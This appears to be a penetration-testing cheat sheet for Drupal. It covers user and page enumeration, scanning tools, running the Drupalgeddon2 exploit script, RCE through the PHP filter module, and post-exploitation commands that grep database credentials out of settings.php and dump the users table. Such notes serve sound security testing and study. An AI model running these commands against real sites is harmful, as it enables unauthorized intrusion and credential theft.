Skip to content

Drupal

Enumeration

Users

  • In /user/register just try to create a username and if the name is already taken it will be notified: The name admin is already taken.
  • If you request a new password for an existing username: Unable to send e-mail. Contact the site administrator if the problem persists.
  • If you request a new password for a non-existent username: Sorry, loremipsum is not recognized as a user name or an e-mail address
  • Accessing /user/<number> you can see the number of existing users, in this case is 2 as /users/3 returns a not found error:

Pages

  • Fuzz From http://drupal.local/node/1 To http://drupal.local/node/500. You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -z range,0-500 -u http://$URL/node/FUZZ --hl 7
  • curl https://example.com/config/sync/core.extension.yml
  • curl https://example.com/core/core.services.yml
  • curl https://example.com/config/sync/swiftmailer.transport.yml

Tools

drupwn

git clone https://github.com/immunIT/drupwn.git
drupwn --mode enum --target http://$IP --users --nodes --modules --dfiles --themes
droopescan
droopescan scan drupal -u http://$IP

Explotation

  • searchsploit drupal
  • searchsploit drupal | grep 'Remote Code Execution'

RCE admin panel Code execution inside Drupal with admin creds You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed) Go to Modules -> (Check) PHP Filter -> Save configuration

RCE

searchsploit Drupalgeddon2
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                              | php/webapps/44449.rb
sudo gem install highline
ruby 44449.rb $IP

Post Exploitation

Read settings.php

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Dump users from DB

mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'